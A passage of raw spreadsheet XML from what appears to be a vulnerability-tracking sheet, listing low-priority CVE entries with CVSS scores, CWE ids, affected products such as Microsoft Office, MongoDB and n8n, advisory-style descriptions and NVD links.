t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Outlook allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80084</t></is></c></row><row r="1145"><c r="A1145" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1145" s="5" t="inlineStr"><is><t>CVE-2026-80086</t></is></c><c r="D1145" s="5" t="n"><v>6.5</v></c><c r="E1145" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1145" s="5" t="inlineStr" /><c r="H1145" s="5" t="n"><v>0.007</v></c><c r="I1145" s="5" t="inlineStr" /><c r="J1145" s="5" t="inlineStr" /><c r="K1145" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1145" s="5" t="inlineStr" /><c r="M1145" s="5" t="inlineStr" /><c r="N1145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1145" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1145" s="5" t="inlineStr" /><c r="R1145" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1145" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80086</t></is></c></row><row r="1146"><c r="A1146" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1146" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1146" s="5" t="inlineStr"><is><t>CVE-2026-80087</t></is></c><c r="D1146" s="5" t="n"><v>6.5</v></c><c r="E1146" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1146" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1146" s="5" t="inlineStr" /><c r="H1146" s="5" t="n"><v>0.007</v></c><c r="I1146" s="5" t="inlineStr" /><c r="J1146" s="5" t="inlineStr" /><c r="K1146" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1146" s="5" t="inlineStr" /><c r="M1146" s="5" t="inlineStr" /><c r="N1146" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1146" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1146" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1146" s="5" t="inlineStr" /><c r="R1146" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1146" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1146" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80087</t></is></c></row><row r="1147"><c r="A1147" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1147" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1147" s="5" t="inlineStr"><is><t>CVE-2026-80088</t></is></c><c r="D1147" s="5" t="n"><v>6.5</v></c><c r="E1147" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1147" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1147" s="5" t="inlineStr" /><c r="H1147" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1147" s="5" t="inlineStr" /><c r="J1147" s="5" t="inlineStr" /><c r="K1147" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1147" s="5" t="inlineStr" /><c r="M1147" s="5" t="inlineStr" /><c r="N1147" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1147" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1147" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1147" s="5" t="inlineStr" /><c r="R1147" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1147" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1147" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80088</t></is></c></row><row r="1148"><c r="A1148" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1148" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1148" s="5" t="inlineStr"><is><t>CVE-2026-80089</t></is></c><c r="D1148" s="5" t="n"><v>6.5</v></c><c r="E1148" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1148" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1148" s="5" t="inlineStr" /><c r="H1148" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1148" s="5" t="inlineStr" /><c r="J1148" s="5" t="inlineStr" /><c r="K1148" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1148" s="5" t="inlineStr" /><c r="M1148" s="5" t="inlineStr" /><c r="N1148" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1148" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1148" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1148" s="5" t="inlineStr" /><c r="R1148" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1148" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1148" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80089</t></is></c></row><row r="1149"><c r="A1149" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1149" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1149" s="5" t="inlineStr"><is><t>CVE-2026-80090</t></is></c><c r="D1149" s="5" t="n"><v>6.5</v></c><c r="E1149" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1149" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1149" s="5" t="inlineStr" /><c r="H1149" s="5" t="n"><v>0.007</v></c><c r="I1149" s="5" t="inlineStr" /><c r="J1149" s="5" t="inlineStr" /><c r="K1149" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1149" s="5" t="inlineStr" /><c r="M1149" s="5" t="inlineStr" /><c r="N1149" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1149" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1149" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1149" s="5" t="inlineStr" /><c r="R1149" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1149" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1149" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80090</t></is></c></row><row r="1150"><c r="A1150" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1150" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1150" s="5" t="inlineStr"><is><t>CVE-2026-80091</t></is></c><c r="D1150" s="5" t="n"><v>6.5</v></c><c r="E1150" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1150" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1150" s="5" t="inlineStr" /><c r="H1150" s="5" t="n"><v>0.007</v></c><c r="I1150" s="5" t="inlineStr" /><c r="J1150" s="5" t="inlineStr" /><c r="K1150" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1150" s="5" t="inlineStr" /><c r="M1150" s="5" t="inlineStr" /><c r="N1150" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1150" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1150" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1150" s="5" t="inlineStr" /><c r="R1150" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1150" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1150" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80091</t></is></c></row><row r="1151"><c r="A1151" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1151" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1151" s="5" t="inlineStr"><is><t>CVE-2026-81377</t></is></c><c r="D1151" s="5" t="n"><v>6.5</v></c><c r="E1151" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1151" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1151" s="5" t="inlineStr" /><c r="H1151" s="5" t="n"><v>0.008</v></c><c r="I1151" s="5" t="inlineStr" /><c r="J1151" s="5" t="inlineStr" /><c r="K1151" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L1151" s="5" t="inlineStr" /><c r="M1151" s="5" t="inlineStr" /><c r="N1151" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1151" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1151" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1151" s="5" t="inlineStr" /><c r="R1151" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1151" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to perform tampering over a network.</t></is></c><c r="T1151" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81377</t></is></c></row><row r="1152"><c r="A1152" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1152" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1152" s="5" t="inlineStr"><is><t>CVE-2026-81792</t></is></c><c r="D1152" s="5" t="n"><v>6.5</v></c><c r="E1152" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1152" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1152" s="5" t="inlineStr" /><c r="H1152" s="5" t="n"><v>0.002</v></c><c r="I1152" s="5" t="inlineStr" /><c r="J1152" s="5" t="inlineStr" /><c r="K1152" s="5" t="inlineStr" /><c r="L1152" s="5" t="inlineStr" /><c r="M1152" s="5" t="inlineStr" /><c r="N1152" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1152" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1152" s="5" t="inlineStr" /><c r="R1152" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1152" s="5" t="inlineStr"><is><t>Unauthenticated Privilege Escalation in Product Catalog Enquiry for WooCommerce by MultiVendorX &lt;= 6.1.4 versions.</t></is></c><c r="T1152" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81792</t></is></c></row><row r="1153"><c r="A1153" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1153" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1153" s="5" t="inlineStr"><is><t>CVE-2026-81802</t></is></c><c r="D1153" s="5" t="n"><v>6.5</v></c><c r="E1153" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1153" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G1153" s="5" t="inlineStr" /><c r="H1153" s="5" t="n"><v>0.002</v></c><c r="I1153" s="5" t="inlineStr" /><c r="J1153" s="5" t="inlineStr" /><c r="K1153" s="5" t="inlineStr" /><c r="L1153" s="5" t="inlineStr" /><c r="M1153" s="5" t="inlineStr" /><c r="N1153" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1153" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1153" s="5" t="inlineStr" /><c r="R1153" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1153" s="5" t="inlineStr"><is><t>Unauthenticated Insecure Direct Object References (IDOR) in WpEvently &lt;= 5.6.0 versions.</t></is></c><c r="T1153" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81802</t></is></c></row><row r="1154"><c r="A1154" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1154" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1154" s="5" t="inlineStr"><is><t>CVE-2026-82059</t></is></c><c r="D1154" s="5" t="n"><v>6.5</v></c><c r="E1154" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1154" s="5" t="inlineStr" /><c r="H1154" s="5" t="n"><v>0.003</v></c><c r="I1154" s="5" t="inlineStr" /><c r="J1154" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1154" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1154" s="5" t="inlineStr" /><c r="M1154" s="5" t="inlineStr" /><c r="N1154" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1154" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1154" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1154" s="5" t="inlineStr" /><c r="R1154" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S1154" s="5" t="inlineStr"><is><t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t></is></c><c r="T1154" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t></is></c></row><row r="1155"><c r="A1155" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1155" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1155" s="5" t="inlineStr"><is><t>CVE-2026-82069</t></is></c><c r="D1155" s="5" t="n"><v>6.5</v></c><c r="E1155" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1155" s="5" t="inlineStr" /><c r="H1155" s="5" t="n"><v>0.003</v></c><c r="I1155" s="5" t="inlineStr" /><c r="J1155" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1155" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1155" s="5" t="inlineStr" /><c r="M1155" s="5" t="inlineStr" /><c r="N1155" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1155" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1155" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1155" s="5" t="inlineStr" /><c r="R1155" s="5" t="inlineStr"><is><t>CWE-212</t></is></c><c r="S1155" s="5" t="inlineStr"><is><t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t></is></c><c r="T1155" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t></is></c></row><row r="1156"><c r="A1156" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1156" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1156" s="5" t="inlineStr"><is><t>CVE-2026-84282</t></is></c><c r="D1156" s="5" t="n"><v>6.5</v></c><c r="E1156" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1156" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1156" s="5" t="inlineStr" /><c r="H1156" s="5" t="n"><v>0.002</v></c><c r="I1156" s="5" t="inlineStr" /><c r="J1156" s="5" t="inlineStr" /><c r="K1156" s="5" t="inlineStr" /><c r="L1156" s="5" t="inlineStr" /><c r="M1156" s="5" t="inlineStr" /><c r="N1156" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1156" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1156" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1156" s="5" t="inlineStr" /><c r="R1156" s="5" t="inlineStr" /><c r="S1156" s="5" t="inlineStr"><is><t>A Server-Side Request Forgery (SSRF) vulnerability exists in the ONLYOFFICE ownCloud Integration plugin version 9.12. The /apps/onlyoffice/ajax/settings/address endpoint does not sufficiently validate the user-supplied Document Server URL before initiating outbound connections. An authenticated administrator can manipulate the document server parameter to cause the ownCloud server to send arbitrary requests to attacker-controlled destinations, including localhost and internal network hosts. This allows internal network reconnaissance and TCP port scanning based on differences in server responses.</t></is></c><c r="T1156" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84282</t></is></c></row><row r="1157"><c r="A1157" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1157" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1157" s="5" t="inlineStr"><is><t>CVE-2026-84391</t></is></c><c r="D1157" s="5" t="n"><v>6.5</v></c><c r="E1157" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1157" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1157" s="5" t="inlineStr" /><c r="H1157" s="5" t="n"><v>0.002</v></c><c r="I1157" s="5" t="inlineStr" /><c r="J1157" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1157" s="5" t="inlineStr" /><c r="L1157" s="5" t="inlineStr" /><c r="M1157" s="5" t="inlineStr" /><c r="N1157" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1157" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1157" s="5" t="inlineStr" /><c r="R1157" s="5" t="inlineStr"><is><t>CWE-457</t></is></c><c r="S1157" s="5" t="inlineStr"><is><t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t></is></c><c r="T1157" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t></is></c></row><row r="1158"><c r="A1158" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1158" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1158" s="5" t="inlineStr"><is><t>CVE-2026-84685</t></is></c><c r="D1158" s="5" t="n"><v>6.5</v></c><c r="E1158" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1158" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1158" s="5" t="inlineStr" /><c r="H1158" s="5" t="n"><v>0.002</v></c><c r="I1158" s="5" t="inlineStr" /><c r="J1158" s="5" t="inlineStr" /><c r="K1158" s="5" t="inlineStr" /><c r="L1158" s="5" t="inlineStr" /><c r="M1158" s="5" t="inlineStr" /><c r="N1158" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1158" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1158" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1158" s="5" t="inlineStr" /><c r="R1158" s="5" t="inlineStr"><is><t>CWE-488</t></is></c><c r="S1158" s="5" t="inlineStr"><is><t>The react-native-auth0 SDK's web platform implementation does not scope its in-memory token cache to individual user sessions when operating in a server-side rendering (SSR) environment where module state persists across HTTP requests. Under the listed preconditions, tokens cached in module memory can be retrieved across subsequent requests processed by the same server runtime.</t></is></c><c r="T1158" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84685</t></is></c></row><row r="1159"><c r="A1159" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1159" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1159" s="5" t="inlineStr"><is><t>CVE-2026-86077</t></is></c><c r="D1159" s="5" t="n"><v>6.5</v></c><c r="E1159" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1159" s="5" t="inlineStr" /><c r="H1159" s="5" t="n"><v>0.003</v></c><c r="I1159" s="5" t="inlineStr" /><c r="J1159" s="5" t="inlineStr" /><c r="K1159" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1159" s="5" t="inlineStr" /><c r="M1159" s="5" t="inlineStr" /><c r="N1159" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1159" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1159" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1159" s="5" t="inlineStr" /><c r="R1159" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1159" s="5" t="inlineStr"><is><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is></c><c r="T1159" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86077</t></is></c></row><row r="1160"><c r="A1160" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1160" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1160" s="5" t="inlineStr"><is><t>CVE-2026-86078</t></is></c><c r="D1160" s="5" t="n"><v>6.5</v></c><c r="E1160" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1160" s="5" t="inlineStr" /><c r="H1160" s="5" t="n"><v>0.003</v></c><c r="I1160" s="5" t="inlineStr" /><c r="J1160" s="5" t="inlineStr" /><c r="K1160" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1160" s="5" t="inlineStr" /><c r="M1160" s="5" t="inlineStr" /><c r="N1160" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1160" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1160" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1160" s="5" t="inlineStr" /><c r="R1160" s="5" t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1160" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the Instance AI workflow summary used node names and connection keys from stored workflows as ordinary object keys. A workflow submitted through the REST API could contain __proto__ or constructor, causing nested writes to reach Object.prototype in the main n8n process and disrupt later requests. The affected function is summarizeWorkflowStructure in packages/@n8n/instance-ai/src/tools/workflows/summarize-workflow.ts. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T1160" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86078</t></is></c></row><row r="1161"><c r="A1161" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1161" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1161" s="5" t="inlineStr"><is><t>CVE-2026-86079</t></is></c><c r="D1161" s="5" t="n"><v>6.5</v></c><c r="E1161" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1161" s="5" t="inlineStr" /><c r="H1161" s="5" t="n"><v>0.003</v></c><c r="I1161" s="5" t="inlineStr" /><c r="J1161" s="5" t="inlineStr" /><c r="K1161" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1161" s="5" t="inlineStr" /><c r="M1161" s="5" t="inlineStr" /><c r="N1161" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1161" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1161" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1161" s="5" t="inlineStr" /><c r="R1161" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1161" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Elasticsearch and ElasticSecurity nodes interpolated workflow-controlled index and document identifiers directly into REST request paths. An identifier containing path separators or dot segments could select another index or a cluster administration endpoint under the stored Elasticsearch credential. The affected request construction includes packages/nodes-base/nodes/Elastic/Elasticsearch/GenericFunctions.ts and the missing toPathSegment encoding. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1161" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t></is></c></row><row r="1162"><c r="A1162" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1162" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1162" s="5" t="inlineStr"><is><t>CVE-2026-86082</t></is></c><c r="D1162" s="5" t="n"><v>6.5</v></c><c r="E1162" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1162" s="5" t="inlineStr" /><c r="H1162" s="5" t="n"><v>0.002</v></c><c r="I1162" s="5" t="inlineStr" /><c r="J1162" s="5" t="inlineStr" /><c r="K1162" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1162" s="5" t="inlineStr" /><c r="M1162" s="5" t="inlineStr" /><c r="N1162" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1162" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1162" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1162" s="5" t="inlineStr" /><c r="R1162" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1162" s="5" t="inlineStr"><is><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is></c><c r="T1162" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86082</t></is></c></row><row r="1163"><c r="A1163" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1163" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1163" s="5" t="inlineStr"><is><t>CVE-2026-86550</t></is></c><c r="D1163" s="5" t="n"><v>6.5</v></c><c r="E1163" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1163" s="5" t="inlineStr"><is><t>psirt@zte.com.cn</t></is></c><c r="G1163" s="5" t="inlineStr" /><c r="H1163" s="5" t="n"><v>0.003</v></c><c r="I1163" s="5" t="inlineStr" /><c r="J1163" s="5" t="inlineStr" /><c r="K1163" s="5" t="inlineStr" /><c r="L1163" s="5" t="inlineStr" /><c r="M1163" s="5" t="inlineStr" /><c r="N1163" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1163" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1163" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1163" s="5" t="inlineStr" /><c r="R1163" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1163" s="5" t="inlineStr"><is><t>NuBrowser lacks protocol whitelist validation for the S.browser_fallback_url field of intent://, allowing attackers to inject javascript: URLs via 302 redirects. This results in a universal cross‑site scripting (UXSS) vulnerability that enables script execution within the origin of arbitrary websites.</t></is></c><c r="T1163" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86550</t></is></c></row><row r="1164"><c r="A1164" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1164" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1164" s="5" t="inlineStr"><is><t>CVE-2026-86597</t></is></c><c r="D1164" s="5" t="n"><v>6.5</v></c><c r="E1164" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1164" s="5" t="inlineStr"><is><t>412d305a-227d-44f9-a262-a31ba44f2aea</t></is></c><c r="G1164" s="5" t="inlineStr" /><c r="H1164" s="5" t="n"><v>0.001</v></c><c r="I1164" s="5" t="inlineStr" /><c r="J1164" s="5" t="inlineStr" /><c r="K1164" s="5" t="inlineStr" /><c r="L1164" s="5" t="inlineStr" /><c r="M1164" s="5" t="inlineStr" /><c r="N1164" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1164" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1164" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1164" s="5" t="inlineStr" /><c r="R1164" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1164" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log files in the Snowflake Python, Go, JDBC, Node.js, PHP PDO, and ODBC drivers allowed authentication tokens, query-result encryption keys, pre-signed cloud-storage URLs, and SAML assertions to be written to diagnostic logs in circumstances where the available log redaction did not cover all affected log paths and data types. An attacker 